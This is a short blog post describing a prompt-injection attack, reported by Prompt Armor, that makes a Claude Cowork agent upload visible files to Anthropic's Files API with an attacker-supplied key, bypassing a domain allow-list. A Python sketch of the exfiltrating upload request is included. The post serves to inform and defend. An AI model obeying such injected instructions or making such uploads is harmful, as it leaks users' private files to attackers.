
Simon Willison’s Weblog


Wednesday, 14th January 2026

Claude Cowork Exfiltrates Files (via) Claude Cowork defaults to allowing outbound HTTP traffic only to a specific list of domains, to help protect the user against prompt injection attacks that exfiltrate their data.

Prompt Armor found a creative workaround: Anthropic's own API domain is on that list. Their attack includes an attacker-controlled Anthropic API key and instructs the agent to upload any files it can see to the https://api.anthropic.com/v1/files endpoint, where the attacker can retrieve their content later.
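As a rough sketch of why the allow-list doesn't help here, this is the general shape of the request the injected instructions would have the agent make. The endpoint and `x-api-key` header come from Anthropic's documented Files API; the beta header value, filename and key are illustrative assumptions, not details from the Prompt Armor write-up:

```python
# Illustrative sketch: the agent is tricked into uploading a local file to
# Anthropic's Files API using an API key the attacker supplied in the prompt,
# so the attacker can later fetch it from their own account. The traffic goes
# to api.anthropic.com, which is on the default allow-list.
import requests

ATTACKER_API_KEY = "sk-ant-..."  # hypothetical attacker-controlled key

with open("confidential.txt", "rb") as f:  # hypothetical victim file
    response = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",  # assumed current beta header
        },
        files={"file": ("confidential.txt", f, "text/plain")},
    )

print(response.json())  # file ID the attacker can retrieve with their own key
```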

# 10:15 pm / security, ai, prompt-injection, generative-ai, llms, anthropic, exfiltration-attacks, ai-agents, claude-code, lethal-trifecta, claude-cowork
